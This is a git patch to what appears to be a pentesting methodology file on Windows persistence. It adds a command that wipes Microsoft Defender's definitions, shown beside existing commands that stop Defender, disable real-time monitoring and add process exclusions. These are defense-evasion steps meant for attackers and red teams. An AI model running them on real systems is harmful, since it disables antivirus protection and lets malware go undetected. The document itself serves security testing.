From 6584df310ffa88c483f39efc6a3f6c8cff2d152c Mon Sep 17 00:00:00 2001 From: Markus Date: Thu, 14 Oct 2021 08:53:25 +0200 Subject: [PATCH] Update Windows - Persistence.md Add example to `disable windows defender` which uses MpCmdRun.exe to reset the current definitions. I recently used this and it was sufficient, that defender did not recognize previously flagged malicious files. It is quite helpful in case, that Set-MpPreference is not present or that the attacker is not allowed to adjust the service. --- Methodology and Resources/Windows - Persistence.md | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index d9dcc1d..db779d2 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -51,6 +51,10 @@ sc config WinDefend start= disabled sc stop WinDefend Set-MpPreference -DisableRealtimeMonitoring $true +# Wipe currently stored definitions +# Location of MpCmdRun.exe: C:\ProgramData\Microsoft\Windows Defender\Platform\ +MpCmdRun.exe -RemoveDefinitions -All + ## Exclude a process / location Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe" Add-MpPreference -ExclusionProcess 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' @@ -376,4 +380,4 @@ Enter-PSSession -ComputerName -Credential \Administr * [Persistence – Winlogon Helper DLL - @netbiosX](https://pentestlab.blog/2020/01/14/persistence-winlogon-helper-dll/) * [Persistence - BITS Jobs - @netbiosX](https://pentestlab.blog/2019/10/30/persistence-bits-jobs/) * [Persistence – Image File Execution Options Injection - @netbiosX](https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/) -* [Persistence – Registry Run Keys - @netbiosX](https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/) \ No newline at end of file +* [Persistence – Registry Run Keys - @netbiosX](https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/)